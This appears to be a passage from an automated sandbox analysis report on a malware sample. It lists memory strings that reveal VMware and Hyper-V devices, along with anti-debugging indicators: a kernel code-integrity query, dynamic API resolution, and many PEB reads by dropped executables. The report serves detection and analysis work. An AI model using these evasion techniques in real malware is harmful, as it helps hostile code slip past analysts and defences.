Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.732920845.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp Binary or memory string: 000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAY
Source: explorer.exe, 00000006.00000000.716770307.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.732920845.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.714052805.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 3C84.exe, 00000017.00000002.1072882664.000000000118D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426900 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426900
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB912BD mov esi, dword ptr fs:[00000030h] 20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB912BD mov eax, dword ptr fs:[00000030h] 20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB912BD mov eax, dword ptr fs:[00000030h] 20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61AA0 mov eax, dword ptr fs:[00000030h] 20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95AA0 mov eax, dword ptr fs:[00000030h] 20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95AA0 mov eax, dword ptr fs:[00000030h] 20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ADD mov eax, dword ptr fs:[00000030h] 20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9D294 mov eax, dword ptr fs:[00000030h] 20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9D294 mov eax, dword ptr fs:[00000030h] 20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h] 20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h] 20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h] 20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63ACA mov eax, dword ptr fs:[00000030h] 20_2_6AB63ACA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h] 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h] 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h] 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64A20 mov eax, dword ptr fs:[00000030h] 20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64A20 mov eax, dword ptr fs:[00000030h] 20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEEA20 mov eax, dword ptr fs:[00000030h] 20_2_6ABEEA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1B260 mov eax, dword ptr fs:[00000030h] 20_2_6AC1B260
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1B260 mov eax, dword ptr fs:[00000030h] 20_2_6AC1B260
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38A62 mov eax, dword ptr fs:[00000030h] 20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB83A1C mov eax, dword ptr fs:[00000030h] 20_2_6AB83A1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov ecx, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB78A0A mov eax, dword ptr fs:[00000030h] 20_2_6AB78A0A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA927A mov eax, dword ptr fs:[00000030h] 20_2_6ABA927A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4257 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4257
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h] 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h] 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h] 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h] 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62240 mov ecx, dword ptr fs:[00000030h] 20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62240 mov eax, dword ptr fs:[00000030h] 20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4248 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4248
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h] 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h] 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h] 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 mov ecx, dword ptr fs:[00000030h] 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 mov ecx, dword ptr fs:[00000030h] 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 mov eax, dword ptr fs:[00000030h] 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64B94 mov edi, dword ptr fs:[00000030h] 20_2_6AB64B94
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB623F6 mov eax, dword ptr fs:[00000030h] 20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2138A mov eax, dword ptr fs:[00000030h] 20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov ecx, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61BE9 mov eax, dword ptr fs:[00000030h] 20_2_6AB61BE9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21BA8 mov eax, dword ptr fs:[00000030h] 20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38BB6 mov eax, dword ptr fs:[00000030h] 20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39BBE mov eax, dword ptr fs:[00000030h] 20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38B58 mov eax, dword ptr fs:[00000030h] 20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4320 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4320
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B7A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B7A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2131B mov eax, dword ptr fs:[00000030h] 20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F340 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F340
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6DB40 mov eax, dword ptr fs:[00000030h] 20_2_6AB6DB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF mov eax, dword ptr fs:[00000030h] 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF mov eax, dword ptr fs:[00000030h] 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA90AF mov eax, dword ptr fs:[00000030h] 20_2_6ABA90AF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov ecx, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63880 mov eax, dword ptr fs:[00000030h] 20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63880 mov eax, dword ptr fs:[00000030h] 20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3884 mov eax, dword ptr fs:[00000030h] 20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3884 mov eax, dword ptr fs:[00000030h] 20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h] 20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h] 20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h] 20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB658EC mov eax, dword ptr fs:[00000030h] 20_2_6AB658EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B8E4 mov eax, dword ptr fs:[00000030h] 20_2_6AB8B8E4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B8E4 mov eax, dword ptr fs:[00000030h] 20_2_6AB8B8E4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov ecx, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB670C0 mov eax, dword ptr fs:[00000030h] 20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB670C0 mov eax, dword ptr fs:[00000030h] 20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 mov edi, dword ptr fs:[00000030h] 20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h] 20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h] 20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h] 20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h] 20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC22073 mov eax, dword ptr fs:[00000030h] 20_2_6AC22073
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB78800 mov eax, dword ptr fs:[00000030h] 20_2_6AB78800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8F86D mov eax, dword ptr fs:[00000030h] 20_2_6AB8F86D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC34015 mov eax, dword ptr fs:[00000030h] 20_2_6AC34015
